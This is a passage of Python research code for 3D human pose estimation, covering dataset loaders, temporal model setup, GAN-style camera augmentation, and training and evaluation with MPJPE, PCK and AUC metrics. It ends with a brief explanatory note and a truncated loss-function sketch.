kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > test_generator_s911_flip'.format(test_generator_s911_flip.num_frames()))\n\n # test loader -- 3DHP # all frame are used.\n pkl_path = './data_cross/3dhp/3dhp_testset_bySub.pkl'\n test_generator_3dhp = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='valid_kps_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True)\n test_generator_3dhp_flip = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='valid_kps_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True,\n test_augment=True)\n # test loader -- 3DPWD\n pkl_path = './data_cross/3dpw/3dpw_testset_bySub.pkl'\n test_generator_3dpw = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='joints_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True)\n test_generator_3dpw_flip = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='joints_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True,\n test_augment=True)\n\n ############################\n ## place all test loader together\n ############################\n self.val_generator_dict = {\n 's15678': train_generator_eval,\n 's15678_flip': train_generator_eval_flip,\n 's911': test_generator_s911,\n 's911_flip': test_generator_s911_flip,\n '3dhp': test_generator_3dhp,\n '3dhp_flip': test_generator_3dhp_flip,\n '3dpw': test_generator_3dpw,\n '3dpw_flip': test_generator_3dpw_flip,\n }\n\n def _dataloader_preparation(self, pkl_path, key_2d, key_3d, clip_flg, scale2d=1., test_augment=False):\n \"\"\"\n dataloader for cross data\n \"\"\"\n with open(pkl_path, 'rb') as fp:\n self.logger.info('load from pickle file -> {}'.format(pkl_path))\n tmp_npdict = pickle.load(fp)\n poses_3d = []\n poses_2d = []\n # clip_flg = True\n # [..., :2] for 2D is to remove the confidence channel.\n for sub in tmp_npdict:\n if clip_flg:\n for clip_idx in tmp_npdict[sub]['clip_idx']:\n poses_3d.append(tmp_npdict[sub][key_3d][clip_idx[0]:clip_idx[1]])\n poses_2d.append(tmp_npdict[sub][key_2d][clip_idx[0]:clip_idx[1]][..., :2] * scale2d)\n else:\n poses_3d.append(tmp_npdict[sub][key_3d])\n poses_2d.append(tmp_npdict[sub][key_2d][..., :2] * scale2d)\n\n test_generator = UnchunkedGenerator(cameras=None, poses_3d=poses_3d, poses_2d=poses_2d,\n pad=self.pad, causal_shift=0, augment=test_augment,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames'.format(test_generator.num_frames()))\n return test_generator\n\n def s911_detect2d_dataloader_preparation(self):\n for det2d in ['hr']:\n self.logger.info('INFO: load s911 det2d: {}'.format(det2d))\n self.args.keypoints = det2d\n self.keypoints_preparation()\n self._s911_detect2d_dataloader_preparation(det2d)\n\n def _s911_detect2d_dataloader_preparation(self, det2d):\n causal_shift = 0\n action_filter = None if self.args.actions == '*' else self.args.actions.split(',')\n subjects_test = self.args.subjects_test.split(',')\n\n cameras_valid, cam_rt_valid, poses_valid, poses_valid_2d, contact_valid = self.fetch(subjects_test,\n action_filter)\n\n # test loader -- S911\n test_generator_s911 = UnchunkedGenerator(None, poses_valid, poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > test_generator_s911 > 
det2d:{}'.format(test_generator_s911.num_frames(), det2d))\n test_generator_s911_flip = UnchunkedGenerator(None, poses_valid, poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=True,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info(\n 'INFO: Testing on {} frames > test_generator_s911_flip > det2d:{}'.format(test_generator_s911_flip.num_frames(), det2d))\n\n self.val_generator_dict['S911_{}'.format(det2d)] = test_generator_s911\n self.val_generator_dict['S911_flip_{}'.format(det2d)] = test_generator_s911_flip\n\n def update_fixedfake_train_generator(self):\n \"\"\"\n update dataloader for each epoch\n include bone length augmentation and z-axis rotation\n \"\"\"\n cam_rt_train = self.fixed_fake_database['cam_rt_train']\n cameras_train = self.fixed_fake_database['cameras_train']\n take_list = self.fixed_fake_database['take_list']\n expert_dict = self.fixed_fake_database['expert_dict']\n causal_shift = self.fixed_fake_database['causal_shift']\n extra_expert_dict = self.fixed_fake_database['extra_expert_dict'] # extra for boost exp\n extra_take_list = self.fixed_fake_database['extra_take_list'] # extra for boost exp\n\n fixed_fake_cam_rt_train = []\n fixed_fake_poses_train = []\n fixed_fake_poses_train_2d = []\n for i, take in enumerate(take_list):\n cam_ex = cam_rt_train[i]\n fixed_fake_cam_rt_train.append(cam_ex)\n\n tmp_skt_wpos = expert_dict[take]['skt_wpos'].reshape(-1, 16, 3).astype('float32')\n tmp_skt_wpos = zaxis_randrotation(tmp_skt_wpos)\n tmp_skt_wpos = pose_seq_bl_aug(torch.from_numpy(tmp_skt_wpos)).numpy()\n fixed_fake_poses_camed = world_to_camera_sktpos_v3(tmp_skt_wpos, self.args)\n fixed_fake_poses_train.append(fixed_fake_poses_camed)\n cam_ix = cameras_train[i]\n cam_ix_tf = torch.from_numpy(np.tile(cam_ix, (fixed_fake_poses_camed.shape[0], 1)))\n fixed_fake_poses_train_2d.append(\n project_to_2d_purelinear(fixed_fake_poses_camed))\n\n ############################################################\n # extra\n for i, take in enumerate(extra_take_list):\n i = i % len(cam_rt_train)\n cam_ex = cam_rt_train[i]\n fixed_fake_cam_rt_train.append(cam_ex)\n\n tmp_skt_wpos = extra_expert_dict[take]['skt_wpos'].reshape(-1, 16, 3).astype('float32')\n tmp_skt_wpos = zaxis_randrotation(tmp_skt_wpos)\n tmp_skt_wpos = pose_seq_bl_aug(torch.from_numpy(tmp_skt_wpos)).numpy()\n fixed_fake_poses_camed = world_to_camera_sktpos_v3(tmp_skt_wpos, self.args)\n fixed_fake_poses_train.append(fixed_fake_poses_camed)\n cam_ix = cameras_train[i]\n cam_ix_tf = torch.from_numpy(np.tile(cam_ix, (fixed_fake_poses_camed.shape[0], 1)))\n fixed_fake_poses_train_2d.append(\n project_to_2d_purelinear(fixed_fake_poses_camed))\n ########################################################################################\n\n self.train_generator = ChunkedGenerator(self.args.batch_size // self.args.stride, None,\n fixed_fake_poses_train,\n fixed_fake_poses_train_2d, self.args.stride,\n pad=self.pad, causal_shift=causal_shift, shuffle=True,\n augment=self.args.data_augmentation,\n # augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left, joints_right=self.joints_right)\n self.logger.info('INFO: Training on {} frames'.format(self.train_generator.num_frames()))\n\n def _count_param(self, model, name):\n # print param number size.\n model_params = 0\n for parameter in model.parameters():\n model_params += parameter.numel()\n self.logger.info('INFO: Trainable parameter count for model 
{} is:{}'.format(name, model_params))\n\n def _model_preparation_pos(self):\n ######################################\n # prepare model: posenet: 2d pose -> 3d pose\n ######################################\n filter_widths = [int(x) for x in self.args.architecture.split(',')]\n if not self.args.disable_optimizations and not self.args.dense and self.args.stride == 1:\n # Use optimized model for single-frame predictions\n self.model_pos_train = TemporalModelOptimized1f(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n self.dataset.skeleton().num_joints(),\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels)\n else:\n # When incompatible settings are detected (stride > 1, dense filters, or disabled optimization) fall back to normal model\n self.model_pos_train = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n self.dataset.skeleton().num_joints(),\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels,\n dense=self.args.dense)\n # model for eval\n self.model_pos = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n self.dataset.skeleton().num_joints(),\n filter_widths=filter_widths, causal=self.args.causal, dropout=self.args.dropout,\n channels=self.args.channels, dense=self.args.dense)\n\n ##################################\n ##################################\n\n receptive_field = self.model_pos.receptive_field()\n self.logger.info('INFO: Receptive field: {} frames'.format(receptive_field))\n pad_check = (receptive_field - 1) // 2 # Padding on each side\n assert pad_check == self.pad, 'pad mismatch'\n\n # print param number size.\n self._count_param(self.model_pos_train, 'self.model_pos_train')\n\n self.model_pos = self.model_pos.cuda()\n self.model_pos_train = self.model_pos_train.cuda()\n\n ###################################\n # optimizer.\n ###################################\n self.optimizer_P = torch.optim.Adam(self.model_pos_train.parameters(), lr=self.args.learning_rate)\n\n self.lr_scheduler_P = get_scheduler(self.optimizer_P, policy='lambda', nepoch_fix=0, nepoch=self.args.epochs)\n\n ###################################\n # load pretrain\n ###################################\n if self.args.pretrain:\n ckpt_path = self.args.evaluate\n self.logger.info('Loading checkpoint at {}'.format(ckpt_path))\n checkpoint = torch.load(ckpt_path, map_location=lambda storage, loc: storage)\n self.model_pos_train.load_state_dict(checkpoint['model_pos'])\n self.model_pos.load_state_dict(checkpoint['model_pos'])\n\n def _model_preparation_traj(self):\n ######################################\n # prepare: posenet: 2d pose -> 3d traj\n ######################################\n filter_widths = [int(x) for x in self.args.architecture.split(',')]\n if not self.args.disable_optimizations and not self.args.dense and self.args.stride == 1:\n # Use optimized model for single-frame predictions\n self.model_traj_train = TemporalModelOptimized1f(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n 1,\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels)\n else:\n # When incompatible settings are detected (stride > 1, dense filters, or disabled optimization) fall back to normal model\n self.model_traj_train = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n 1,\n filter_widths=filter_widths, 
causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels,\n dense=self.args.dense)\n # model for eval\n self.model_traj = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n 1,\n filter_widths=filter_widths, causal=self.args.causal, dropout=self.args.dropout,\n channels=self.args.channels, dense=self.args.dense)\n\n ##################################\n ##################################\n\n receptive_field = self.model_traj.receptive_field()\n self.logger.info('INFO: Receptive field: {} frames'.format(receptive_field))\n pad_check = (receptive_field - 1) // 2 # Padding on each side\n assert pad_check == self.pad, 'pad mismatch'\n\n # print param number size.\n self._count_param(self.model_traj_train, 'self.model_traj_train')\n\n self.model_traj = self.model_traj.cuda()\n self.model_traj_train = self.model_traj_train.cuda()\n\n ###################################\n # optimizer.\n ###################################\n self.optimizer_T = torch.optim.Adam(self.model_traj_train.parameters(), lr=self.args.learning_rate)\n\n self.lr_scheduler_T = get_scheduler(self.optimizer_T, policy='lambda', nepoch_fix=0, nepoch=self.args.epochs)\n\n ###################################\n # load pretrain\n ###################################\n if self.args.pretrain:\n ckpt_path = self.args.evaluate\n self.logger.info('Loading checkpoint at {}'.format(ckpt_path))\n checkpoint = torch.load(ckpt_path, map_location=lambda storage, loc: storage)\n self.model_traj_train.load_state_dict(checkpoint['model_traj'])\n self.model_traj.load_state_dict(checkpoint['model_traj'])\n\n def _model_preparation_Gcam(self):\n ######################################\n # prepare model: Gcam: 3d pose -> 3d pose, 2d pose, different cam.\n ######################################\n if self.args.gcam_choice == 'gcam_v0':\n from poseaugtool.model_virtualCam.virtualCam import G_camera\n self.model_Gcam = G_camera(self.args)\n # elif self.args.gcam_choice == 'gcam_v2':\n # from poseaugtool.model_virtualCam.virtualCam import G_camera_v2\n # self.model_Gcam = G_camera_v2(self.args)\n\n filter_ch = [int(x) for x in self.args.Dcamarchitecture.split(',')]\n # if self.args.dcam_choice == 'dcam_v0':\n # from poseaugtool.model_virtualCam.virtualCam import Pose2DVideoDiscriminator\n # self.model_Dcam = Pose2DVideoDiscriminator(ks=self.args.dcam_ks, nh_conv1d=filter_ch).to(self.device)\n # elif self.args.dcam_choice == 'dcam_v2':\n # from poseaugtool.model_virtualCam.virtualCam import Pose2DVideoDiscriminatorV2\n # self.model_Dcam = Pose2DVideoDiscriminatorV2(ks=self.args.dcam_ks, nh_conv1d=filter_ch).to(self.device)\n if self.args.dcam_choice == 'dcam_pa1':\n from poseaugtool.model_virtualCam.virtualCam import Pos2dPairDiscriminator\n self.model_Dcam = Pos2dPairDiscriminator().to(self.device)\n # elif self.args.dcam_choice == 'dcam_v5':\n # from poseaugtool.model_virtualCam.virtualCam import Pos2dPairDiscriminator_v5\n # self.model_Dcam = Pos2dPairDiscriminator_v5().to(self.device)\n # elif self.args.dcam_choice == 'dcam_v6':\n # from poseaugtool.model_virtualCam.virtualCam import Pos2dPairDiscriminator_v6\n # self.model_Dcam = Pos2dPairDiscriminator_v6().to(self.device)\n\n # print param number size.\n self._count_param(self.model_Gcam, 'self.model_Gcam')\n self._count_param(self.model_Dcam, 'self.model_Dcam')\n # to cuda\n self.model_Gcam = self.model_Gcam.cuda()\n self.model_Dcam = self.model_Dcam.cuda()\n ###################################\n # optimizer.\n 
###################################\n self.optimizer_Gcam = optim.Adam(self.model_Gcam.parameters(),\n lr=self.args.lrgcam) # , amsgrad=True) #\n self.lr_scheduler_Gcam = get_scheduler(self.optimizer_Gcam, policy='lambda', nepoch_fix=0,\n nepoch=self.args.epochs)\n\n self.optimizer_Dcam = optim.Adam(self.model_Dcam.parameters(),\n lr=self.args.lrdcam) # , amsgrad=True) #\n self.lr_scheduler_Dcam = get_scheduler(self.optimizer_Dcam, policy='lambda', nepoch_fix=0,\n nepoch=self.args.epochs)\n ###################################\n # load pretrain\n ###################################\n if self.args.pretrain:\n pass\n\n def _train_batch_posenet(self, inputs_2d, inputs_3d, epoch_loss_3d_train, N):\n # here 3D shape is single frame. BxTxJx3: T=1\n target_3d_pose = inputs_3d[:, :, :, :] - inputs_3d[:, :, :1, :]\n # pos_3d[:, 1:] -= inputs_3d[:, :1]\n\n # Predict 3D poses\n predicted_3d_pos = self.model_pos_train(inputs_2d)\n\n self.optimizer_P.zero_grad()\n\n # loss_3d_pos = mpjpe(predicted_3d_pos, target_3d_pose)\n loss_3d_pos = self.MSE(predicted_3d_pos, target_3d_pose)\n loss_total = loss_3d_pos * 1.\n\n loss_total.backward()\n nn.utils.clip_grad_norm_(self.model_pos_train.parameters(),\n max_norm=1)\n self.optimizer_P.step()\n\n epoch_loss_3d_train += target_3d_pose.shape[0] * target_3d_pose.shape[1] * loss_3d_pos.item()\n N += target_3d_pose.shape[0] * target_3d_pose.shape[1]\n\n return loss_3d_pos.detach(), epoch_loss_3d_train, N\n\n def _train_batch_trajnet(self, inputs_2d, inputs_3d, epoch_loss_3d_train, N):\n target_3d_traj = inputs_3d[:, :, :1, :] * 1. # focus on root traj.\n # pos_3d[:, 1:] -= inputs_3d[:, :1]\n\n # Predict 3D trajs\n predicted_3d_traj = self.model_traj_train(inputs_2d)\n # loss_3d_traj = mpjpe(predicted_3d_traj, target_3d_traj)\n\n self.optimizer_T.zero_grad()\n\n # loss_3d_traj = self.MSE(predicted_3d_traj, target_3d_traj)\n # weighted traj loss from videopose\n w = 1 / target_3d_traj[:, :, :, 2] # Weight inversely proportional to depth\n loss_3d_traj = weighted_mpjpe(predicted_3d_traj, target_3d_traj, w)\n\n loss_total = loss_3d_traj * 1.\n\n loss_total.backward()\n nn.utils.clip_grad_norm_(self.model_traj_train.parameters(), max_norm=1) #\n self.optimizer_T.step()\n\n epoch_loss_3d_train += target_3d_traj.shape[0] * target_3d_traj.shape[1] * loss_3d_traj.item()\n N += target_3d_traj.shape[0] * target_3d_traj.shape[1]\n\n return loss_3d_traj.detach(), epoch_loss_3d_train, N\n\n def train_posenet_realpose(self, tag='_real'):\n \"\"\"\n _real: dataloader from random projection\n \"\"\"\n start_time = time()\n epoch_loss_3d_train = 0\n N = 0\n self.model_pos_train.train()\n\n # Regular supervised scenario\n self.logger.info(\n 'INFO: Train on real pose with dataloader len:{:0>4d}'.format(self.train_generator.num_batches))\n for _, batch_3d, batch_2d in tqdm(self.train_generator.next_epoch()):\n inputs_3d = torch.from_numpy(batch_3d.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n\n loss_3d_pos, epoch_loss_3d_train, N = self._train_batch_posenet(inputs_2d, inputs_3d,\n epoch_loss_3d_train, N)\n # batch-wise log\n self.writer.add_scalar('train_P_batch/{}/loss_3d_pos'.format(tag), loss_3d_pos.item(),\n self.summary.train_realpose_iter_num)\n self.summary.summary_train_realpose_iter_num_update()\n\n\n def train_trajnet_realpose(self, tag='_real'):\n \"\"\"\n _real: dataloader from random projection\n \"\"\"\n start_time = time()\n epoch_loss_3d_train 
= 0\n N = 0\n self.model_traj_train.train()\n\n # Regular supervised scenario\n self.logger.info(\n 'INFO: Train on real pose with dataloader len:{:0>4d}'.format(self.train_generator.num_batches))\n for _, batch_3d, batch_2d in tqdm(self.train_generator.next_epoch()):\n inputs_3d = torch.from_numpy(batch_3d.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n\n loss_3d_traj, epoch_loss_3d_train, N = self._train_batch_trajnet(inputs_2d, inputs_3d,\n epoch_loss_3d_train, N)\n # batch-wise log\n self.writer.add_scalar('train_T_batch/{}/loss_3d_traj'.format(tag), loss_3d_traj.item(),\n self.summary.train_realtraj_iter_num)\n self.summary.summary_train_realtraj_iter_num_update()\n\n def _train_dis(self, model_dis, data_real, data_fake, writer_name, fake_data_pool, optimizer):\n \"\"\"\n \"\"\"\n optimizer.zero_grad()\n data_real = data_real.detach()\n data_fake = data_fake.detach()\n # store the fake buffer for discriminator training.\n data_fake = Variable(\n torch.Tensor(fake_data_pool(data_fake.cpu().detach().data.numpy()))).to(\n self.device)\n # for 3d part\n real_3d = model_dis(data_real)\n fake_3d = model_dis(data_fake)\n real_label_3d = Variable(torch.ones(real_3d.size())).to(self.device)\n fake_label_3d = Variable(torch.zeros(fake_3d.size())).to(self.device)\n dis_3d_real_loss = self.MSE(real_3d, real_label_3d)\n dis_3d_fake_loss = self.MSE(fake_3d, fake_label_3d)\n\n # Total discriminators losses\n dis_3d_loss = (dis_3d_real_loss + dis_3d_fake_loss) * 0.5\n\n # record acc\n d3d_real_acc = get_discriminator_accuracy(real_3d.reshape(-1), real_label_3d.reshape(-1))\n d3d_fake_acc = get_discriminator_accuracy(fake_3d.reshape(-1), fake_label_3d.reshape(-1))\n\n self.writer.add_scalar(writer_name + '_real_acc', d3d_real_acc, self.summary.train_iter_num)\n self.writer.add_scalar(writer_name + '_fake_acc', d3d_fake_acc, self.summary.train_iter_num)\n self.writer.add_scalar(writer_name + '_dis_loss', dis_3d_loss.item(), self.summary.train_iter_num)\n\n # Update optimizer\n ###################################################\n dis_3d_loss.backward()\n nn.utils.clip_grad_norm_(model_dis.parameters(), max_norm=1)\n optimizer.step()\n return d3d_real_acc, d3d_fake_acc\n\n def evaluate_posenet(self, tag='real', valset='s911'):\n \"\"\"\n evaluate the performance of posenet on 3 kinds of dataset\n \"\"\"\n start_time = time()\n # End-of-epoch evaluation\n with torch.no_grad():\n self.model_pos.load_state_dict(self.model_pos_train.state_dict())\n self.model_pos.eval()\n\n epoch_p1_3d_valid = 0\n epoch_p2_3d_valid = 0\n N_valid = 0\n\n test_generator = self.val_generator_dict[valset]\n for _, batch, batch_2d in test_generator.next_epoch():\n inputs_3d = torch.from_numpy(batch.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n # inputs_3d[:, :, 0] = 0\n inputs_3d[:, :, :, :] = inputs_3d[:, :, :, :] - inputs_3d[:, :, :1, :]\n\n # Predict 3D poses\n predicted_3d_pos = self.model_pos(inputs_2d)\n\n # Test-time augmentation (if enabled)\n if test_generator.augment_enabled():\n # Undo flipping and take average with non-flipped version\n predicted_3d_pos[1, :, :, 0] *= -1\n predicted_3d_pos[1, :, test_generator.joints_left + test_generator.joints_right] = \\\n predicted_3d_pos[1, :, test_generator.joints_right + test_generator.joints_left]\n\n predicted_3d_pos = 
torch.mean(predicted_3d_pos, dim=0, keepdim=True)\n inputs_3d = inputs_3d[:1]\n\n loss_3d_pos = mpjpe(predicted_3d_pos, inputs_3d)\n epoch_p1_3d_valid += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()\n N_valid += inputs_3d.shape[0] * inputs_3d.shape[1]\n\n p2_3d_pos = p_mpjpe(predicted_3d_pos.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])\n , inputs_3d.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1]))\n epoch_p2_3d_valid += inputs_3d.shape[0] * inputs_3d.shape[1] * p2_3d_pos.item()\n\n # analysis result\n epoch_p1_3d_valid = epoch_p1_3d_valid / N_valid * 1000\n epoch_p2_3d_valid = epoch_p2_3d_valid / N_valid * 1000\n\n elapsed = (time() - start_time) / 60\n\n # epoch-wise log.\n self.writer.add_scalar('eval_P_epoch_{}/{}_p1'.format(tag, valset), epoch_p1_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_epoch_{}/{}_p2'.format(tag, valset), epoch_p2_3d_valid, self.summary.epoch)\n\n return {'p1': epoch_p1_3d_valid}\n\n def evaluate_posenet_withPCK(self, tag='real', valset='3dhp_flip'):\n \"\"\"\n evaluate the performance of posenet for 3DHP\n :return:\n \"\"\"\n start_time = time()\n # End-of-epoch evaluation\n with torch.no_grad():\n self.model_pos.load_state_dict(self.model_pos_train.state_dict())\n self.model_pos.eval()\n\n epoch_p1_3d_valid = 0\n epoch_p2_3d_valid = 0\n epoch_pck_3d_valid = 0\n epoch_auc_3d_valid = 0\n epoch_pck_3dscaled_valid = 0\n epoch_auc_3dscaled_valid = 0\n epoch_pck_3daligned_valid = 0\n epoch_auc_3daligned_valid = 0\n N_valid = 0\n\n test_generator = self.val_generator_dict[valset]\n for _, batch, batch_2d in test_generator.next_epoch():\n inputs_3d = torch.from_numpy(batch.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n # inputs_3d[:, :, 0] = 0\n inputs_3d[:, :, :, :] = inputs_3d[:, :, :, :] - inputs_3d[:, :, :1, :]\n\n # Predict 3D poses\n predicted_3d_pos = self.model_pos(inputs_2d)\n\n # Test-time augmentation (if enabled)\n if test_generator.augment_enabled():\n # Undo flipping and take average with non-flipped version\n predicted_3d_pos[1, :, :, 0] *= -1\n predicted_3d_pos[1, :, test_generator.joints_left + test_generator.joints_right] = \\\n predicted_3d_pos[1, :, test_generator.joints_right + test_generator.joints_left]\n\n predicted_3d_pos = torch.mean(predicted_3d_pos, dim=0, keepdim=True)\n inputs_3d = inputs_3d[:1]\n\n # to numpy\n predicted_3d_pos = predicted_3d_pos.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])\n inputs_3d = inputs_3d.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])\n # align a pose result\n predicted_3d_pos_aligned = pose_align(predicted_3d_pos, inputs_3d)\n # align a pose result\n predicted_3d_pos_scaled = pose_scaled(torch.from_numpy(predicted_3d_pos).unsqueeze(0), torch.from_numpy(inputs_3d).unsqueeze(0)).squeeze(0).cpu().numpy()\n\n # caculate p1 p2 pck auc\n loss_3d_pos = mpjpe(torch.from_numpy(predicted_3d_pos), torch.from_numpy(inputs_3d)).item() * 1000.0\n p2_3d_pos = p_mpjpe(predicted_3d_pos, inputs_3d).item() * 1000.0\n # compute AUC and PCK\n pck = compute_PCK(inputs_3d, predicted_3d_pos)\n auc = compute_AUC(inputs_3d, predicted_3d_pos)\n\n # compute AUC and PCK after aligned\n pck_aligned = compute_PCK(inputs_3d, predicted_3d_pos_aligned)\n auc_aligned = compute_AUC(inputs_3d, predicted_3d_pos_aligned)\n\n # compute AUC and PCK after aligned\n pck_scaled = compute_PCK(inputs_3d, 
predicted_3d_pos_scaled)\n auc_scaled = compute_AUC(inputs_3d, predicted_3d_pos_scaled)\n\n epoch_p1_3d_valid += inputs_3d.shape[0] * loss_3d_pos\n epoch_p2_3d_valid += inputs_3d.shape[0] * p2_3d_pos\n epoch_pck_3d_valid += inputs_3d.shape[0] * pck\n epoch_auc_3d_valid += inputs_3d.shape[0] * auc\n\n epoch_pck_3daligned_valid += inputs_3d.shape[0] * pck_aligned\n epoch_auc_3daligned_valid += inputs_3d.shape[0] * auc_aligned\n\n epoch_pck_3dscaled_valid += inputs_3d.shape[0] * pck_scaled\n epoch_auc_3dscaled_valid += inputs_3d.shape[0] * auc_scaled\n\n N_valid += inputs_3d.shape[0]\n\n # analysis result\n epoch_p1_3d_valid = epoch_p1_3d_valid / N_valid\n epoch_p2_3d_valid = epoch_p2_3d_valid / N_valid\n epoch_pck_3d_valid = epoch_pck_3d_valid / N_valid\n epoch_auc_3d_valid = epoch_auc_3d_valid / N_valid\n\n epoch_pck_3daligned_valid = epoch_pck_3daligned_valid / N_valid\n epoch_auc_3daligned_valid = epoch_auc_3daligned_valid / N_valid\n\n epoch_pck_3dscaled_valid = epoch_pck_3dscaled_valid / N_valid\n epoch_auc_3dscaled_valid = epoch_auc_3dscaled_valid / N_valid\n\n elapsed = (time() - start_time) / 60\n\n # epoch-wise log.\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_p1'.format(tag, valset), epoch_p1_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_p2'.format(tag, valset), epoch_p2_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_pck'.format(tag, valset), epoch_pck_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_auc'.format(tag, valset), epoch_auc_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_pck_aligned'.format(tag, valset), epoch_pck_3daligned_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_auc_aligned'.format(tag, valset), epoch_auc_3daligned_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_pck_scaled'.format(tag, valset), epoch_pck_3dscaled_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_auc_scaled'.format(tag, valset), epoch_auc_3dscaled_valid, self.summary.epoch)\n\n return {\n 'p1': epoch_p1_3d_valid,\n 'p2': epoch_p2_3d_valid,\n }\n\n\n def evaluate_trajnet(self, tag='real', valset='s911'):\n \"\"\"\n evaluate the performance of posenet\n \"\"\"\n start_time = time()\n # End-of-epoch evaluation\n with torch.no_grad():\n self.model_traj.load_state_dict(self.model_traj_train.state_dict())\n self.model_traj.eval()\n\n epoch_p1_3d_valid = 0\n N_valid = 0\n\n # Evaluate on test set\n for cam, batch, batch_2d in self.val_generator_dict[valset].next_epoch():\n inputs_3d = torch.from_numpy(batch.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n target_3d_traj = inputs_3d[:, :, :1, :] * 1. 
# focus on root traj.\n\n # Predict 3D trajes\n predicted_3d_traj = self.model_traj(inputs_2d)\n loss_3d_traj = mpjpe(predicted_3d_traj, target_3d_traj)\n epoch_p1_3d_valid += target_3d_traj.shape[0] * target_3d_traj.shape[1] * loss_3d_traj.item()\n N_valid += target_3d_traj.shape[0] * target_3d_traj.shape[1]\n\n # analysis result\n epoch_p1_3d_valid = epoch_p1_3d_valid / N_valid * 1000\n\n elapsed = (time() - start_time) / 60\n\n # epoch-wise log.\n self.writer.add_scalar('eval_T_epoch_{}/{}_p1'.format(tag, valset), epoch_p1_3d_valid, self.summary.epoch)\n\n return {'p1': epoch_p1_3d_valid}\n\n def _zip_GIFplot_array(self, tensor_lst):\n \"\"\"\n for plot function pre-preocess\n \"\"\"\n lst = []\n for item in tensor_lst:\n if item.shape[-1] == 3: # for 3D case\n lst.append(item.detach().cpu().numpy()[:1])\n elif item.shape[-1] == 2:\n tmp2d = item.detach().cpu().numpy()[:1]\n tmp2d = np.concatenate([tmp2d, np.zeros_like(tmp2d)[..., -1:]], axis=-1)\n lst.append(tmp2d)\n else:\n assert False, 'wrong data get'\n return np.concatenate(lst)\n\n def random_aug_d2d(self, x):\n r1 = self.args.d2d_random_lb\n r2 = self.args.d2d_random_ub\n random_weight = torch.FloatTensor(x.shape[0], 1, 1, 1).uniform_(r1, r2).to(x.device)\n return x * random_weight\n\n","repo_name":"Garfield-kh/PoseTriplet","sub_path":"estimator/posegan_basementclass.py","file_name":"posegan_basementclass.py","file_ext":"py","file_size_in_byte":54981,"program_lang":"python","lang":"en","doc_type":"code","stars":293,"dataset":"github-code","pt":"61"}
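The training and evaluation methods above lean on mpjpe and weighted_mpjpe from common.loss, which is not included in this record. A minimal sketch of those losses, assuming the usual definitions (mean per-joint Euclidean error, optionally scaled by a per-joint weight such as the inverse root depth used for the trajectory loss), could look like the following; the repository's own implementations may differ in detail:

# Sketch only: mpjpe/weighted_mpjpe come from common.loss, which is not shown
# in this record; these follow the usual definitions and may differ in detail.
import torch

def mpjpe_sketch(predicted, target):
    # Mean per-joint position error: mean Euclidean distance over all joints.
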